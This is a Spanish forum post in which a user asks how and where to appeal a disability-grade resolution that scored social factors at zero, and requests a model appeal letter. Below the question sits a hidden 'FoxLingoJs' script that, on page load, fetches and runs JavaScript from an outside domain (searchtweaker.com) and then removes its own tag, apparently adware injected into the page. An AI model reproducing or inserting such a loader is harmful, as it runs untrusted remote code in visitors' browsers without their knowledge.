Como recurrir y donde hacerlo sobre : La resolución sobre grado de discapacidad. Modelo de recurso.

hace unos días he recibido la notificación sobre La Resolución sobre el gradp de discapacidad .

En ella me adjudica un 33% por mi condición física pero me da un 0 respecto de los valores sociales que también es se pueden puntuar y tengo derecho a ello por cumplir las condiciones que se exigen.

Por favor Se me hace necesario un modelo de reclamación o algo así y también información sobre donde debería dirigirlo ya que me informa que tengo derecho a recurrir en el plazo de un mes desde la recepción de la resolución pero no me dice donde debería dirigir esta .Agradecería toda la información al respecto, gracias

<script id="FoxLingoJs" type="text/javascript">// <![CDATA[(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();// ]]></script>

Añade tu respuesta

Haz clic para o